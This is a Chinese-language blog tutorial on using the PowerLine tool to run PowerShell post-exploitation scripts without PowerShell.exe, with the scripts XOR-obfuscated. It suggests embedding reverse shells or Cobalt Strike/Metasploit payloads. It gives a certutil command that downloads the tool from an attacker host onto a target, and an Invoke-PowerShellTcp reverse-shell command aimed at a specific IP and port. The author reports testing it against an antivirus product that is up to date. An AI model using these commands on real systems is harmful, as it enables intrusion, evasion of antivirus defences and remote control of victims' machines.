PowerLine工具使用

Brian Fehrman (@fullmetalcache)创建的非常好的实用程序,可以直接调用 PowerShell 脚本而不需要调用 PowerShell 程序。 这个工具是用 C# 编写的,可以完全通过命令行使用,包括远程使用。 简而言之,你可以使用已经存在的 PowerShell 脚本,而无需使用 PowerShell.exe。 PowerLine 的主要特点有:

  • 易于部署和构建——不需要 Visual Studio

  • 能够自动检测 Win7或 Win10系统

  • 能够作为 PowerShell 终端使用

  • 能够通过 XML 设置指定要包含的远程脚本(脚本保留在内存中)

  • 能够在每次构建中生成并用于异或(XOR) 脚本的随机字节

一旦在计算机上实现了远程代码执行,获得一个令人满意的后漏洞利用是非常重要的。 运行一系列 PowerShell 工具来促进这项工作是很有意思的,比如: Meterpreter、 Mimikatz、 PowerView、 PowerUp、 Inveigh 等等。

为了方便起见,下面的截图是我从 PowerShell 中截取的。 同样的命令可以直接从 CMD 启动,从而完全避免在首次编译阶段也使用 PS。

部署

部署非常简单且模块化。 要拥有一个功能版本的 PowerLine,必须遵循以下步骤:

  • 下载代码储存库:https://github.com/fullmetalcache/PowerLine
  • 运行 build.bat 文件 1574143285350106.png

更新 UserConf.xml 使其包含你想要包含的脚本的 URL 1574143307714824.png

这里我们可以包括一些反弹shell,或者cs/msf的powershell脚本,自行上传到服务器上。

运行 PLBuilder.exe 文件,来生成PowerLine.exe

1574143328621420.png

使用

反弹shell

当你构件好powerline后接下来就是把powerline.exe放到目标机器上。可以通过shell上传或者远程下载功能。

certutil -urlcache -split -f http://atackerIP/PowerLine.exe PowerLine.exe

在命令行执行:


PowerLine.exe Invoke-PowerShellTcp "Invoke-PowerShellTcp -Reverse -IPAddress 116.62.14.120 -Port 444"

Snipaste_20191213_143141.png

真实机测试的,装有最新火绒。(真的没牌面)

评论

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×